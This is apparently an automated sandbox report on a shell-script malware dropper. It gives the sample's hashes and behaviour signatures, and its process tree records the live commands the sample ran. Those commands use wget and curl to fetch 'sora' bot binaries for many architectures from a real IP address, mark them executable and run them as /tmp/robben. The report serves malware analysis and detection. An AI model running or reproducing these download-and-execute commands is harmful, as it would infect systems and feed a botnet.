Analysis
max time kernel: 85s
max time network: 88s
platform: debian-9_mips
resource: debian9-mipsbe-20240611-en
resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted: 18/10/2024, 02:04
Static task
  static1
Behavioral task
  behavioral1  Sample: 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh  Resource: ubuntu1804-amd64-20240611-en
Behavioral task
  behavioral2  Sample: 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh  Resource: debian9-armhf-20240729-en
Behavioral task
  behavioral3  Sample: 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh  Resource: debian9-mipsbe-20240611-en
Behavioral task
  behavioral4  Sample: 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh  Resource: debian9-mipsel-20240729-en
General
Target: 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Size: 2KB
MD5: 5d873bf46fd4ff411eb17e42d5ae2980
SHA1: fd73b1bb3b7241d68fcaac4f4bf9cc6164b6fa06
SHA256: 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d
SHA512: f58f94eaa5f9440db6b1c41915be89331d7355904631d3ede46adfd517e493b3e49979d0ad0a535d8d6181ac81e0d19d6ba0dcb33765b54bbc16830828cc6382
Malware Config
Signatures
File and Directory Permissions Modification (1 TTPs, 14 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
  pid  Process
  797  chmod
  861  chmod
  776  chmod
  729  chmod
  750  chmod
  867  chmod
  717  chmod
  855  chmod
  879  chmod
  819  chmod
  741  chmod
  762  chmod
  873  chmod
  735  chmod

Executes dropped EXE (14 IoCs)
  ioc          pid  Process
  /tmp/robben  719  robben
  /tmp/robben  730  robben
  /tmp/robben  736  robben
  /tmp/robben  742  robben
  /tmp/robben  751  robben
  /tmp/robben  763  robben
  /tmp/robben  778  robben
  /tmp/robben  800  robben
  /tmp/robben  820  robben
  /tmp/robben  856  robben
  /tmp/robben  862  robben
  /tmp/robben  868  robben
  /tmp/robben  874  robben
  /tmp/robben  880  robben

Reads runtime system information (14 IoCs)
  description              ioc                              Process
  File opened for reading  /proc/sys/crypto/fips_enabled    curl
  (the same entry is recorded 14 times, once per curl process in the process tree)

System Network Configuration Discovery (1 TTPs, 3 IoCs)
Adversaries may gather information about the network configuration of a system.
  pid  Process
  721  wget
  724  curl
  727  cat

Writes file to tmp directory (1 IoCs)
Malware often drops required files in the /tmp directory.
  description                   ioc          Process
  File opened for modification  /tmp/robben  7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Processes
Root process (depth 1):
  /tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
  command line: /tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
  PID: 692
  signatures: Writes file to tmp directory

Child processes (depth 2), one line each: PID, image, command line, [signatures]

  696  /usr/bin/wget  wget http://93.123.85.141/bins/sora.x86
  705  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.x86  [Reads runtime system information]
  716  /bin/cat       cat sora.x86
  717  /bin/chmod     chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-FpU7jx  [File and Directory Permissions Modification]
  719  /tmp/robben    ./robben Payload  [Executes dropped EXE]

  721  /usr/bin/wget  wget http://93.123.85.141/bins/sora.mips  [System Network Configuration Discovery]
  724  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.mips  [Reads runtime system information; System Network Configuration Discovery]
  727  /bin/cat       cat sora.mips  [System Network Configuration Discovery]
  729  /bin/chmod     chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-FpU7jx  [File and Directory Permissions Modification]
  730  /tmp/robben    ./robben Payload  [Executes dropped EXE]

  732  /usr/bin/wget  wget http://93.123.85.141/bins/sora.x86_64
  733  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.x86_64  [Reads runtime system information]
  734  /bin/cat       cat sora.x86_64
  735  /bin/chmod     chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-FpU7jx  [File and Directory Permissions Modification]
  736  /tmp/robben    ./robben Payload  [Executes dropped EXE]

  738  /usr/bin/wget  wget http://93.123.85.141/bins/sora.i468
  739  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.i468  [Reads runtime system information]
  740  /bin/cat       cat sora.i468
  741  /bin/chmod     chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-FpU7jx  [File and Directory Permissions Modification]
  742  /tmp/robben    ./robben Payload  [Executes dropped EXE]

  744  /usr/bin/wget  wget http://93.123.85.141/bins/sora.i686
  745  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.i686  [Reads runtime system information]
  749  /bin/cat       cat sora.i686
  750  /bin/chmod     chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben  [File and Directory Permissions Modification]
  751  /tmp/robben    ./robben Payload  [Executes dropped EXE]

  753  /usr/bin/wget  wget http://93.123.85.141/bins/sora.mpsl
  754  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.mpsl  [Reads runtime system information]
  761  /bin/cat       cat sora.mpsl
  762  /bin/chmod     chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben  [File and Directory Permissions Modification]
  763  /tmp/robben    ./robben Payload  [Executes dropped EXE]

  766  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm4
  769  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm4  [Reads runtime system information]
  775  /bin/cat       cat sora.arm4
  776  /bin/chmod     chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben  [File and Directory Permissions Modification]
  778  /tmp/robben    ./robben Payload  [Executes dropped EXE]

  781  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm5
  789  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm5  [Reads runtime system information]
  795  /bin/cat       cat sora.arm5
  797  /bin/chmod     chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben  [File and Directory Permissions Modification]
  800  /tmp/robben    ./robben Payload  [Executes dropped EXE]

  802  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm6
  813  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm6  [Reads runtime system information]
  818  /bin/cat       cat sora.arm6
  819  /bin/chmod     chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben  [File and Directory Permissions Modification]
  820  /tmp/robben    ./robben Payload  [Executes dropped EXE]

  822  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm7
  823  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm7  [Reads runtime system information]
  854  /bin/cat       cat sora.arm7
  855  /bin/chmod     chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben  [File and Directory Permissions Modification]
  856  /tmp/robben    ./robben Payload  [Executes dropped EXE]

  858  /usr/bin/wget  wget http://93.123.85.141/bins/sora.ppc
  859  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.ppc  [Reads runtime system information]
  860  /bin/cat       cat sora.ppc
  861  /bin/chmod     chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben  [File and Directory Permissions Modification]
  862  /tmp/robben    ./robben Payload  [Executes dropped EXE]

  864  /usr/bin/wget  wget http://93.123.85.141/bins/sora.ppc440fp
  865  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.ppc440fp  [Reads runtime system information]
  866  /bin/cat       cat sora.ppc440fp
  867  /bin/chmod     chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben  [File and Directory Permissions Modification]
  868  /tmp/robben    ./robben Payload  [Executes dropped EXE]

  870  /usr/bin/wget  wget http://93.123.85.141/bins/sora.m68k
  871  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.m68k  [Reads runtime system information]
  872  /bin/cat       cat sora.m68k
  873  /bin/chmod     chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben  [File and Directory Permissions Modification]
  874  /tmp/robben    ./robben Payload  [Executes dropped EXE]

  876  /usr/bin/wget  wget http://93.123.85.141/bins/sora.sh4
  877  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.sh4  [Reads runtime system information]
  878  /bin/cat       cat sora.sh4
  879  /bin/chmod     chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben  [File and Directory Permissions Modification]
  880  /tmp/robben    ./robben Payload  [Executes dropped EXE]